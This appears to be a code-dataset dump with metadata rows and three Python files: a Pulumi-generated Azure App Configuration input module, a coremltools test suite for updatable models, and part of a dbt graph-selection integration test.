| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86cbad315b39f630c07d3238693f37baadea5815
| 11,121
|
py
|
Python
|
sdk/python/pulumi_azure/appconfiguration/_inputs.py
|
roderik/pulumi-azure
|
f6d0c058d6f9111a709bc5f1515d1638f9d615f0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/appconfiguration/_inputs.py
|
roderik/pulumi-azure
|
f6d0c058d6f9111a709bc5f1515d1638f9d615f0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/appconfiguration/_inputs.py
|
roderik/pulumi-azure
|
f6d0c058d6f9111a709bc5f1515d1638f9d615f0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'ConfigurationStoreIdentityArgs',
'ConfigurationStorePrimaryReadKeyArgs',
'ConfigurationStorePrimaryWriteKeyArgs',
'ConfigurationStoreSecondaryReadKeyArgs',
'ConfigurationStoreSecondaryWriteKeyArgs',
]
@pulumi.input_type
class ConfigurationStoreIdentityArgs:
    # NOTE: generated by the Pulumi Terraform Bridge (tfgen); logic should not
    # be hand-edited. Comments below are review annotations only.
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 identity_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 principal_id: Optional[pulumi.Input[str]] = None,
                 tenant_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] type: Specifies the type of Managed Service Identity that should be configured on this API Management Service. Possible values are `SystemAssigned`, `UserAssigned`, `SystemAssigned, UserAssigned` (to enable both).
        :param pulumi.Input[Sequence[pulumi.Input[str]]] identity_ids: A list of IDs for User Assigned Managed Identity resources to be assigned.
        :param pulumi.Input[str] principal_id: The ID of the Principal (Client) in Azure Active Directory.
        :param pulumi.Input[str] tenant_id: The ID of the Azure Active Directory Tenant.
        """
        pulumi.set(__self__, "type", type)
        # Optional fields are only set when provided, so absent keys stay unset
        # in the underlying resource arguments.
        if identity_ids is not None:
            pulumi.set(__self__, "identity_ids", identity_ids)
        if principal_id is not None:
            pulumi.set(__self__, "principal_id", principal_id)
        if tenant_id is not None:
            pulumi.set(__self__, "tenant_id", tenant_id)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        Specifies the type of Managed Service Identity that should be configured on this API Management Service. Possible values are `SystemAssigned`, `UserAssigned`, `SystemAssigned, UserAssigned` (to enable both).
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter(name="identityIds")
    def identity_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of IDs for User Assigned Managed Identity resources to be assigned.
        """
        return pulumi.get(self, "identity_ids")

    @identity_ids.setter
    def identity_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "identity_ids", value)

    @property
    @pulumi.getter(name="principalId")
    def principal_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Principal (Client) in Azure Active Directory.
        """
        return pulumi.get(self, "principal_id")

    @principal_id.setter
    def principal_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "principal_id", value)

    @property
    @pulumi.getter(name="tenantId")
    def tenant_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Azure Active Directory Tenant.
        """
        return pulumi.get(self, "tenant_id")

    @tenant_id.setter
    def tenant_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tenant_id", value)
@pulumi.input_type
class ConfigurationStorePrimaryReadKeyArgs:
    """Primary read access key of a Configuration Store (connection string,
    ID and secret). All fields are optional; presumably they mirror
    server-assigned values — confirm against the provider schema.
    Generated by the Pulumi Terraform Bridge; keep edits to comments only.
    """
    def __init__(__self__, *,
                 connection_string: Optional[pulumi.Input[str]] = None,
                 id: Optional[pulumi.Input[str]] = None,
                 secret: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] connection_string: The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
        :param pulumi.Input[str] id: The ID of the Access Key.
        :param pulumi.Input[str] secret: The Secret of the Access Key.
        """
        # Only set fields the caller supplied, so unset values stay absent.
        if connection_string is not None:
            pulumi.set(__self__, "connection_string", connection_string)
        if id is not None:
            pulumi.set(__self__, "id", id)
        if secret is not None:
            pulumi.set(__self__, "secret", secret)

    @property
    @pulumi.getter(name="connectionString")
    def connection_string(self) -> Optional[pulumi.Input[str]]:
        """
        The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
        """
        return pulumi.get(self, "connection_string")

    @connection_string.setter
    def connection_string(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "connection_string", value)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Access Key.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def secret(self) -> Optional[pulumi.Input[str]]:
        """
        The Secret of the Access Key.
        """
        return pulumi.get(self, "secret")

    @secret.setter
    def secret(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "secret", value)
@pulumi.input_type
class ConfigurationStorePrimaryWriteKeyArgs:
    """Primary write access key of a Configuration Store (connection string,
    ID and secret). Structure is identical to the read-key args class.
    Generated by the Pulumi Terraform Bridge; keep edits to comments only.
    """
    def __init__(__self__, *,
                 connection_string: Optional[pulumi.Input[str]] = None,
                 id: Optional[pulumi.Input[str]] = None,
                 secret: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] connection_string: The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
        :param pulumi.Input[str] id: The ID of the Access Key.
        :param pulumi.Input[str] secret: The Secret of the Access Key.
        """
        # Only set fields the caller supplied, so unset values stay absent.
        if connection_string is not None:
            pulumi.set(__self__, "connection_string", connection_string)
        if id is not None:
            pulumi.set(__self__, "id", id)
        if secret is not None:
            pulumi.set(__self__, "secret", secret)

    @property
    @pulumi.getter(name="connectionString")
    def connection_string(self) -> Optional[pulumi.Input[str]]:
        """
        The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
        """
        return pulumi.get(self, "connection_string")

    @connection_string.setter
    def connection_string(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "connection_string", value)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Access Key.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def secret(self) -> Optional[pulumi.Input[str]]:
        """
        The Secret of the Access Key.
        """
        return pulumi.get(self, "secret")

    @secret.setter
    def secret(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "secret", value)
@pulumi.input_type
class ConfigurationStoreSecondaryReadKeyArgs:
    """Secondary read access key of a Configuration Store (connection string,
    ID and secret). Structure is identical to the primary-key args classes.
    Generated by the Pulumi Terraform Bridge; keep edits to comments only.
    """
    def __init__(__self__, *,
                 connection_string: Optional[pulumi.Input[str]] = None,
                 id: Optional[pulumi.Input[str]] = None,
                 secret: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] connection_string: The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
        :param pulumi.Input[str] id: The ID of the Access Key.
        :param pulumi.Input[str] secret: The Secret of the Access Key.
        """
        # Only set fields the caller supplied, so unset values stay absent.
        if connection_string is not None:
            pulumi.set(__self__, "connection_string", connection_string)
        if id is not None:
            pulumi.set(__self__, "id", id)
        if secret is not None:
            pulumi.set(__self__, "secret", secret)

    @property
    @pulumi.getter(name="connectionString")
    def connection_string(self) -> Optional[pulumi.Input[str]]:
        """
        The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
        """
        return pulumi.get(self, "connection_string")

    @connection_string.setter
    def connection_string(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "connection_string", value)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Access Key.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def secret(self) -> Optional[pulumi.Input[str]]:
        """
        The Secret of the Access Key.
        """
        return pulumi.get(self, "secret")

    @secret.setter
    def secret(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "secret", value)
@pulumi.input_type
class ConfigurationStoreSecondaryWriteKeyArgs:
    """Secondary write access key of a Configuration Store (connection
    string, ID and secret). Structure is identical to the sibling key
    args classes.
    Generated by the Pulumi Terraform Bridge; keep edits to comments only.
    """
    def __init__(__self__, *,
                 connection_string: Optional[pulumi.Input[str]] = None,
                 id: Optional[pulumi.Input[str]] = None,
                 secret: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] connection_string: The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
        :param pulumi.Input[str] id: The ID of the Access Key.
        :param pulumi.Input[str] secret: The Secret of the Access Key.
        """
        # Only set fields the caller supplied, so unset values stay absent.
        if connection_string is not None:
            pulumi.set(__self__, "connection_string", connection_string)
        if id is not None:
            pulumi.set(__self__, "id", id)
        if secret is not None:
            pulumi.set(__self__, "secret", secret)

    @property
    @pulumi.getter(name="connectionString")
    def connection_string(self) -> Optional[pulumi.Input[str]]:
        """
        The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
        """
        return pulumi.get(self, "connection_string")

    @connection_string.setter
    def connection_string(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "connection_string", value)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Access Key.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def secret(self) -> Optional[pulumi.Input[str]]:
        """
        The Secret of the Access Key.
        """
        return pulumi.get(self, "secret")

    @secret.setter
    def secret(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "secret", value)
| 35.990291
| 246
| 0.632767
| 1,320
| 11,121
| 5.191667
| 0.083333
| 0.117175
| 0.130746
| 0.134831
| 0.847804
| 0.800671
| 0.782431
| 0.757478
| 0.748431
| 0.741865
| 0
| 0.00012
| 0.251956
| 11,121
| 308
| 247
| 36.107143
| 0.823657
| 0.241975
| 0
| 0.725806
| 1
| 0
| 0.087217
| 0.022918
| 0
| 0
| 0
| 0
| 0
| 1
| 0.198925
| false
| 0
| 0.026882
| 0
| 0.33871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
810a30af53923464d3f05031b3d9a710c2d1b016
| 25,303
|
py
|
Python
|
src/external/coremltools_wrap/coremltools/coremltools/test/pipeline/test_model_updatable.py
|
cookingcodewithme/turicreate
|
a89e203d60529d2d72547c03ec9753ea979ee342
|
[
"BSD-3-Clause"
] | 11,356
|
2017-12-08T19:42:32.000Z
|
2022-03-31T16:55:25.000Z
|
src/external/coremltools_wrap/coremltools/coremltools/test/pipeline/test_model_updatable.py
|
cookingcodewithme/turicreate
|
a89e203d60529d2d72547c03ec9753ea979ee342
|
[
"BSD-3-Clause"
] | 2,402
|
2017-12-08T22:31:01.000Z
|
2022-03-28T19:25:52.000Z
|
src/external/coremltools_wrap/coremltools/coremltools/test/pipeline/test_model_updatable.py
|
cookingcodewithme/turicreate
|
a89e203d60529d2d72547c03ec9753ea979ee342
|
[
"BSD-3-Clause"
] | 1,343
|
2017-12-08T19:47:19.000Z
|
2022-03-26T11:31:36.000Z
|
# Copyright (c) 2017, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
import os, shutil
import numpy as _np
import coremltools.models.datatypes as datatypes
import unittest
import pytest
import tempfile
from coremltools.models.utils import save_spec
from coremltools.models import MLModel
from coremltools.models.neural_network import (
NeuralNetworkBuilder,
AdamParams,
SgdParams,
)
from coremltools.models.pipeline import PipelineRegressor, PipelineClassifier
class MLModelUpdatableTest(unittest.TestCase):
    """Tests for marking Core ML neural networks and pipelines as updatable.

    Covers: attaching loss layers (cross-entropy / MSE) and optimizers
    (SGD / Adam), epoch configuration, auto-generated training inputs,
    and ``make_updatable`` semantics on pipeline models.
    """

    @classmethod
    def setUpClass(cls):
        # Scratch directory shared by all tests for serialized .mlmodel
        # files; removed once in tearDownClass.
        cls.model_dir = tempfile.mkdtemp()

    @classmethod
    def tearDownClass(cls):
        if os.path.exists(cls.model_dir):
            shutil.rmtree(cls.model_dir)

    # ------------------------------------------------------------------
    # helpers
    # ------------------------------------------------------------------

    @staticmethod
    def _add_updatable_ip_layers(builder):
        """Add two bias-free 3x3 inner-product layers (ip1 -> ip2) and mark
        both updatable."""
        W1 = _np.random.uniform(-0.5, 0.5, (3, 3))
        W2 = _np.random.uniform(-0.5, 0.5, (3, 3))
        builder.add_inner_product(
            name="ip1",
            W=W1,
            b=None,
            input_channels=3,
            output_channels=3,
            has_bias=False,
            input_name="input",
            output_name="hidden",
        )
        builder.add_inner_product(
            name="ip2",
            W=W2,
            b=None,
            input_channels=3,
            output_channels=3,
            has_bias=False,
            input_name="hidden",
            output_name="output",
        )
        builder.make_updatable(["ip1", "ip2"])  # or a dict for weightParams

    def create_base_builder(self):
        """Return a builder for a 2-layer updatable network.

        Also records ``input_features`` / ``output_features`` /
        ``output_names`` on ``self`` for the pipeline tests.
        """
        self.input_features = [("input", datatypes.Array(3))]
        self.output_features = [("output", None)]
        self.output_names = ["output"]
        builder = NeuralNetworkBuilder(self.input_features, self.output_features)
        self._add_updatable_ip_layers(builder)
        return builder

    def _save_and_reload_spec(self, builder):
        """Round-trip ``builder.spec`` through disk and return the reloaded spec."""
        model_path = os.path.join(self.model_dir, "updatable_creation.mlmodel")
        save_spec(builder.spec, model_path)
        mlmodel = MLModel(model_path)
        self.assertIsNotNone(mlmodel)
        return mlmodel.get_spec()

    def _set_mse_adam(self, builder):
        """Attach an MSE loss, an Adam optimizer and epoch settings."""
        builder.set_mean_squared_error_loss(
            name="mse", input_feature=("output", datatypes.Array(3))
        )
        builder.set_adam_optimizer(
            AdamParams(lr=1e-2, batch=10, beta1=0.9, beta2=0.999, eps=1e-8)
        )
        builder.set_epochs(20, allowed_set=[10, 20, 30])

    def _assert_layers_updatable(self, spec):
        """The model and both inner-product layers (and their weights) are updatable."""
        self.assertTrue(spec.isUpdatable)
        for layer in spec.neuralNetwork.layers[:2]:
            self.assertTrue(layer.isUpdatable)
            self.assertTrue(layer.innerProduct.weights.isUpdatable)

    def _assert_loss_layer(self, spec, field_name):
        """Assert the loss-layer oneof member ``field_name`` is the one set.

        Protobuf sub-message access never yields ``None``, so the previous
        ``... is not None`` assertions were vacuously true — and the MSE
        tests were (incorrectly, via copy-paste) naming the cross-entropy
        field. ``HasField`` checks which oneof member is actually present.
        """
        self.assertTrue(
            spec.neuralNetwork.updateParams.lossLayers[0].HasField(field_name)
        )

    def _assert_sgd_defaults(self, spec, batch_set):
        """SGD optimizer survived serialization with expected defaults/ranges."""
        self.assertTrue(
            spec.neuralNetwork.updateParams.optimizer.HasField("sgdOptimizer")
        )
        opt = spec.neuralNetwork.updateParams.optimizer.sgdOptimizer
        self.assertTrue(_np.isclose(opt.learningRate.defaultValue, 1e-2, atol=1e-4))
        self.assertTrue(_np.isclose(opt.miniBatchSize.defaultValue, 10, atol=1e-4))
        self.assertTrue(_np.isclose(opt.momentum.defaultValue, 0, atol=1e-8))
        self.assertEqual(opt.miniBatchSize.set.values, batch_set)
        for param in (opt.learningRate, opt.momentum):
            self.assertEqual(param.range.minValue, 0)
            self.assertEqual(param.range.maxValue, 1)

    def _assert_adam_defaults(self, spec, batch_set):
        """Adam optimizer survived serialization with expected defaults/ranges."""
        self.assertTrue(
            spec.neuralNetwork.updateParams.optimizer.HasField("adamOptimizer")
        )
        opt = spec.neuralNetwork.updateParams.optimizer.adamOptimizer
        self.assertTrue(_np.isclose(opt.learningRate.defaultValue, 1e-2, atol=1e-4))
        self.assertTrue(_np.isclose(opt.miniBatchSize.defaultValue, 10, atol=1e-4))
        self.assertTrue(_np.isclose(opt.beta1.defaultValue, 0.9, atol=1e-4))
        self.assertTrue(_np.isclose(opt.beta2.defaultValue, 0.999, atol=1e-4))
        self.assertTrue(_np.isclose(opt.eps.defaultValue, 1e-8, atol=1e-8))
        self.assertEqual(opt.miniBatchSize.set.values, batch_set)
        for param in (opt.learningRate, opt.beta1, opt.beta2, opt.eps):
            self.assertEqual(param.range.minValue, 0)
            self.assertEqual(param.range.maxValue, 1)

    def _assert_epochs_default(self, spec, default):
        self.assertTrue(
            _np.isclose(
                spec.neuralNetwork.updateParams.epochs.defaultValue,
                default,
                atol=1e-4,
            )
        )

    def _assert_training_inputs(self, spec):
        """Training inputs are the model input plus the auto-generated target."""
        training_input = spec.description.trainingInput
        self.assertEqual(training_input[0].name, "input")
        self.assertEqual(training_input[0].type.WhichOneof("Type"), "multiArrayType")
        self.assertEqual(training_input[1].name, "output_true")
        self.assertEqual(training_input[1].type.WhichOneof("Type"), "multiArrayType")

    def _assert_pipeline_updatable_lifecycle(self, pipeline, builder, target_type):
        """Drive make_updatable() through its failure modes and success path.

        ``builder.spec.isUpdatable`` must be False on entry; ``target_type``
        is the expected WhichOneof("Type") of the second training input.
        """
        # fails due to missing sub-models
        with self.assertRaises(ValueError):
            pipeline.make_updatable()
        self.assertFalse(pipeline.spec.isUpdatable)
        # fails due to sub-model being not updatable
        pipeline.add_model(builder.spec)
        with self.assertRaises(ValueError):
            pipeline.make_updatable()
        self.assertFalse(pipeline.spec.isUpdatable)
        # succeeds once an updatable sub-model is present
        builder.spec.isUpdatable = True
        pipeline.add_model(builder.spec)
        self.assertFalse(pipeline.spec.isUpdatable)
        pipeline.make_updatable()
        self.assertTrue(pipeline.spec.isUpdatable)
        training_input = pipeline.spec.description.trainingInput
        self.assertEqual(training_input[0].name, "input")
        self.assertEqual(training_input[0].type.WhichOneof("Type"), "multiArrayType")
        self.assertEqual(training_input[1].name, "target")
        self.assertEqual(training_input[1].type.WhichOneof("Type"), target_type)
        # once updatable, adding further models is rejected
        with self.assertRaises(ValueError):
            pipeline.add_model(builder.spec)
        self.assertTrue(pipeline.spec.isUpdatable)

    # ------------------------------------------------------------------
    # neural-network creation tests
    # ------------------------------------------------------------------

    def test_updatable_model_creation_ce_sgd(self):
        """Cross-entropy loss + SGD optimizer round-trips through disk."""
        builder = self.create_base_builder()
        builder.add_softmax(
            name="softmax", input_name="output", output_name="softmax_output"
        )
        builder.set_categorical_cross_entropy_loss(
            name="cross_entropy", input="softmax_output"
        )
        builder.set_sgd_optimizer(SgdParams(lr=1e-2, batch=10, momentum=0.0))
        builder.set_epochs(20, allowed_set=[10, 20, 30, 40])
        spec = self._save_and_reload_spec(builder)
        self._assert_layers_updatable(spec)
        self._assert_loss_layer(spec, "categoricalCrossEntropyLossLayer")
        self._assert_sgd_defaults(spec, batch_set=[10])
        self._assert_epochs_default(spec, 20)

    def test_updatable_model_creation_ce_adam(self):
        """Cross-entropy loss + Adam optimizer round-trips through disk."""
        builder = self.create_base_builder()
        builder.add_softmax(
            name="softmax", input_name="output", output_name="softmax_output"
        )
        builder.set_categorical_cross_entropy_loss(
            name="cross_entropy", input="softmax_output"
        )
        adam_params = AdamParams()
        adam_params.set_batch(value=10, allowed_set=[10, 20])
        builder.set_adam_optimizer(adam_params)
        builder.set_epochs(20)
        spec = self._save_and_reload_spec(builder)
        self._assert_layers_updatable(spec)
        self._assert_loss_layer(spec, "categoricalCrossEntropyLossLayer")
        self._assert_adam_defaults(spec, batch_set=[10, 20])
        self._assert_epochs_default(spec, 20)
        self.assertEqual(spec.neuralNetwork.updateParams.epochs.set.values, [20])

    def test_updatable_model_creation_mse_sgd(self):
        """MSE loss + SGD optimizer round-trips through disk."""
        builder = self.create_base_builder()
        builder.set_mean_squared_error_loss(
            name="mse", input_feature=("output", datatypes.Array(3))
        )
        builder.set_sgd_optimizer(SgdParams(lr=1e-2, batch=10, momentum=0.0))
        builder.set_epochs(20)
        spec = self._save_and_reload_spec(builder)
        self._assert_layers_updatable(spec)
        # Bug fix: the original asserted the cross-entropy field here even
        # though the loss set above is MSE.
        self._assert_loss_layer(spec, "meanSquaredErrorLossLayer")
        self._assert_sgd_defaults(spec, batch_set=[10])
        self._assert_epochs_default(spec, 20)

    def test_updatable_model_creation_mse_adam(self):
        """MSE loss + Adam optimizer round-trips through disk."""
        builder = self.create_base_builder()
        self._set_mse_adam(builder)
        spec = self._save_and_reload_spec(builder)
        self._assert_layers_updatable(spec)
        # Bug fix: the original asserted the cross-entropy field here even
        # though the loss set above is MSE.
        self._assert_loss_layer(spec, "meanSquaredErrorLossLayer")
        self._assert_adam_defaults(spec, batch_set=[10])
        self._assert_epochs_default(spec, 20)
        self.assertEqual(
            spec.neuralNetwork.updateParams.epochs.set.values, [10, 20, 30]
        )

    # ------------------------------------------------------------------
    # invalid-configuration tests
    # ------------------------------------------------------------------

    def test_nn_set_cce_without_softmax_fail(self):
        nn_builder = self.create_base_builder()
        # fails since adding CCE without softmax must raise error
        with self.assertRaises(ValueError):
            nn_builder.set_categorical_cross_entropy_loss(
                name="cross_entropy", input="output"
            )

    def test_nn_set_cce_invalid(self):
        nn_builder = self.create_base_builder()
        nn_builder.add_softmax(
            name="softmax", input_name="output", output_name="softmax_output"
        )
        # fails since CCE input must be softmax output
        with self.assertRaises(ValueError):
            nn_builder.set_categorical_cross_entropy_loss(
                name="cross_entropy", input="output"
            )

    def test_nn_set_softmax_updatable_invalid(self):
        nn_builder = self.create_base_builder()
        nn_builder.add_softmax(
            name="softmax", input_name="output", output_name="softmax_output"
        )
        # fails since marking softmax as updatable layer is not allowed
        with self.assertRaises(ValueError):
            nn_builder.make_updatable(["softmax"])

    # ------------------------------------------------------------------
    # training-input tests
    # ------------------------------------------------------------------

    def test_nn_set_training_input(self):
        """Setting a loss generates the expected training inputs."""
        builder = self.create_base_builder()
        self._set_mse_adam(builder)
        spec = self._save_and_reload_spec(builder)
        self._assert_training_inputs(spec)

    def test_nn_builder_with_training_features(self):
        """As above, but the output feature is declared with an explicit shape."""
        input_features = [("input", datatypes.Array(3))]
        output_features = [("output", datatypes.Array(3))]
        builder = NeuralNetworkBuilder(input_features, output_features)
        self._add_updatable_ip_layers(builder)
        self._set_mse_adam(builder)
        spec = self._save_and_reload_spec(builder)
        self._assert_training_inputs(spec)

    # ------------------------------------------------------------------
    # pipeline tests
    # ------------------------------------------------------------------

    def test_pipeline_regressor_make_updatable(self):
        builder = self.create_base_builder()
        builder.spec.isUpdatable = False
        training_input = [("input", datatypes.Array(3)), ("target", "Double")]
        p_regressor = PipelineRegressor(
            self.input_features, self.output_names, training_input
        )
        self._assert_pipeline_updatable_lifecycle(p_regressor, builder, "doubleType")

    def test_pipeline_classifier_make_updatable(self):
        builder = self.create_base_builder()
        builder.spec.isUpdatable = False
        training_input = [("input", datatypes.Array(3)), ("target", "String")]
        p_classifier = PipelineClassifier(
            self.input_features, self.output_names, training_features=training_input
        )
        self._assert_pipeline_updatable_lifecycle(p_classifier, builder, "stringType")

    def test_pipeline_classifier_set_training_inputs(self):
        """Same lifecycle, but training inputs supplied via set_training_input()."""
        builder = self.create_base_builder()
        builder.spec.isUpdatable = False
        training_input = [("input", datatypes.Array(3)), ("target", "String")]
        p_classifier = PipelineClassifier(self.input_features, self.output_names)
        p_classifier.set_training_input(training_input)
        self._assert_pipeline_updatable_lifecycle(p_classifier, builder, "stringType")

    def test_shuffle_on_by_default(self):
        builder = self.create_base_builder()
        # base builder already marks two layers as updatable
        self.assertTrue(
            builder.nn_spec.updateParams.shuffle.defaultValue,
            "Shuffle not turned on by default for updatable models",
        )
| 34.804677
| 99
| 0.616844
| 2,517
| 25,303
| 6.048868
| 0.087008
| 0.078161
| 0.068571
| 0.109951
| 0.905681
| 0.901281
| 0.89156
| 0.874351
| 0.866404
| 0.856946
| 0
| 0.018774
| 0.288464
| 25,303
| 726
| 100
| 34.852617
| 0.826872
| 0.034739
| 0
| 0.710311
| 0
| 0
| 0.034175
| 0.006392
| 0
| 0
| 0
| 0
| 0.216039
| 1
| 0.026187
| false
| 0
| 0.016367
| 0
| 0.045827
| 0.00982
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8122f609da7d662364ad17a4c215d8edb379b3b0
| 13,420
|
py
|
Python
|
test/integration/007_graph_selection_tests/test_graph_selection.py
|
jankytara2/dbt
|
3f4069ab6d4d5b3fc34f8fe785761b5617357b0f
|
[
"Apache-2.0"
] | null | null | null |
test/integration/007_graph_selection_tests/test_graph_selection.py
|
jankytara2/dbt
|
3f4069ab6d4d5b3fc34f8fe785761b5617357b0f
|
[
"Apache-2.0"
] | null | null | null |
test/integration/007_graph_selection_tests/test_graph_selection.py
|
jankytara2/dbt
|
3f4069ab6d4d5b3fc34f8fe785761b5617357b0f
|
[
"Apache-2.0"
] | null | null | null |
from test.integration.base import DBTIntegrationTest, use_profile
import yaml
import json
import os
class TestGraphSelection(DBTIntegrationTest):
@property
def schema(self):
return "graph_selection_tests_007"
@property
def models(self):
return "models"
@property
def selectors_config(self):
return yaml.safe_load('''
selectors:
- name: bi_selector
description: This is a BI selector
definition:
method: tag
value: bi
''')
def assert_correct_schemas(self):
with self.get_connection():
exists = self.adapter.check_schema_exists(
self.default_database,
self.unique_schema()
)
self.assertTrue(exists)
schema = self.unique_schema()+'_and_then'
exists = self.adapter.check_schema_exists(
self.default_database,
schema
)
self.assertFalse(exists)
@use_profile('postgres')
def test__postgres__specific_model(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--select', 'users'])
self.assertEqual(len(results), 1)
self.assertTablesEqual("seed", "users")
created_models = self.get_models_in_schema()
self.assertFalse('users_rollup' in created_models)
self.assertFalse('alternative.users' in created_models)
self.assertFalse('base_users' in created_models)
self.assertFalse('emails' in created_models)
self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__tags(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--selector', 'bi_selector'])
self.assertEqual(len(results), 2)
created_models = self.get_models_in_schema()
self.assertFalse('alternative.users' in created_models)
self.assertFalse('base_users' in created_models)
self.assertFalse('emails' in created_models)
self.assertTrue('users' in created_models)
self.assertTrue('users_rollup' in created_models)
self.assert_correct_schemas()
self.assertTrue(os.path.exists('./target/manifest.json'))
with open('./target/manifest.json') as fp:
manifest = json.load(fp)
self.assertTrue('selectors' in manifest)
@use_profile('postgres')
def test__postgres__tags_and_children(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--select', 'tag:base+'])
self.assertEqual(len(results), 5)
created_models = self.get_models_in_schema()
self.assertFalse('base_users' in created_models)
self.assertFalse('emails' in created_models)
self.assertIn('emails_alt', created_models)
self.assertTrue('users_rollup' in created_models)
self.assertTrue('users' in created_models)
self.assertTrue('alternative.users' in created_models)
self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__tags_and_children_limited(self):
    """'tag:base+2' limits descendant traversal to depth 2, so the
    third-level users_rollup_dependency model is excluded."""
    self.run_sql_file("seed.sql")

    results = self.run_dbt(['run', '--select', 'tag:base+2'])
    self.assertEqual(len(results), 4)

    created_models = self.get_models_in_schema()
    self.assertFalse('base_users' in created_models)
    self.assertFalse('emails' in created_models)
    self.assertIn('emails_alt', created_models)
    self.assertIn('users_rollup', created_models)
    self.assertIn('users', created_models)
    self.assertIn('alternative.users', created_models)
    # beyond the +2 depth limit
    self.assertNotIn('users_rollup_dependency', created_models)
    self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__specific_model_and_children(self):
    """'users+' selects the named model plus all of its descendants."""
    self.run_sql_file("seed.sql")

    results = self.run_dbt(['run', '--select', 'users+'])
    self.assertEqual(len(results), 4)
    self.assertTablesEqual("seed", "users")
    self.assertTablesEqual("summary_expected", "users_rollup")

    created_models = self.get_models_in_schema()
    self.assertIn('emails_alt', created_models)
    # upstream/unrelated models must not run
    self.assertNotIn('base_users', created_models)
    self.assertNotIn('alternative.users', created_models)
    self.assertNotIn('emails', created_models)
    self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__specific_model_and_children_limited(self):
    """'users+1' selects the named model plus only direct children."""
    self.run_sql_file("seed.sql")

    results = self.run_dbt(['run', '--select', 'users+1'])
    self.assertEqual(len(results), 3)
    self.assertTablesEqual("seed", "users")
